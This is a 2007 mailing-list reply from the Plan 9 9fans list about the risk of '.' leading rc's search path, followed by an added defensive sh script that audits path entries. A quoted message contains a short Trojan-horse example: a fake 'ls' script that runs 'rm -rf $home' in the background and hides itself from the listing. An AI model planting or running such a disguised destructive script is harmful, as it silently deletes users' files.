From: arisawa@ar.aichi-u.ac.jp
Subject: Re: [9fans] security
Date: Sat, 27 Oct 2007 19:04:20 +0900
To: Fans of the OS Plan 9 from Bell Labs <9fans@cse.psu.edu>

Hello,

Removing files is not worth doing.
The victim will immediately find what happened and will recover his files
and then will consider what made the trouble.

I don't say (. /bin) is safe in an untrusted environment.
Someone might steal my private info using some trick.

Security is a tradeoff with convenience.
I guess we (members of 9fans) are happy enough working in a trusted environment.

Kenji Arisawa

On 2007/10/27, at 18:03, roger peppe wrote:

>>> 1) rc: the value of $path is (. /bin). It is a classic case not to
>>> have . as the first directory when searching for programs - it allows
>>> Trojan horses to form.
>>
>> if you're the only one using your system, how could this be a
>> problem?
>
> to be fair, if i'd put a file in /n/sources/contrib/rog/ls:
>
> #!/bin/rc
> rm -rf $home &
> ls $* |* | grep -v ls
>
> then i'm sure there'd be one or two unhappy people around...
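
The search-order issue discussed in this thread, as an added example that is not part of any poster's message: a POSIX sh sketch (not rc) that flags search-path entries which resolve to the current directory or to a world-writable directory, and reports which file a name lookup would pick. The function names `audit_path` and `resolve_in` are hypothetical, and the input is assumed to be a colon-separated path rather than rc's `$path` list.

```shell
#!/bin/sh
# Added example (POSIX sh, not rc). Input is a colon-separated search path;
# on Plan 9 the equivalent input would be the elements of rc's $path list.

# audit_path PATH: print one line per risky entry; return 1 if any was found.
audit_path() {
    rest="$1:" pos=0 bad=0      # trailing ':' keeps a final empty entry
    while [ -n "$rest" ]; do
        entry=${rest%%:*}; rest=${rest#*:}; pos=$((pos + 1))
        case $entry in
        ''|.)
            echo "entry $pos: current directory is searched"; bad=1 ;;
        /*)
            # -prune tests only the directory itself; -H follows a symlinked entry
            if [ -n "$(find -H "$entry" -prune -type d -perm -0002 2>/dev/null)" ]; then
                echo "entry $pos: $entry is world-writable"; bad=1
            fi ;;
        *)
            echo "entry $pos: $entry is relative to the current directory"; bad=1 ;;
        esac
    done
    return "$bad"
}

# resolve_in NAME PATH: print the file a lookup of NAME would select,
# walking PATH in order as the shell does. Returns 1 if nothing matches.
resolve_in() {
    name=$1 rest="$2:"
    while [ -n "$rest" ]; do
        dir=${rest%%:*}; rest=${rest#*:}
        [ -n "$dir" ] || dir=.          # an empty entry means the current directory
        if [ -f "$dir/$name" ] && [ -x "$dir/$name" ]; then
            echo "$dir/$name"; return 0
        fi
    done
    return 1
}

# Typical use: audit_path "$PATH"; resolve_in ls "$PATH"
```

Comparing `resolve_in ls` against the expected system location shows whether a file in the working directory would be chosen ahead of the real command.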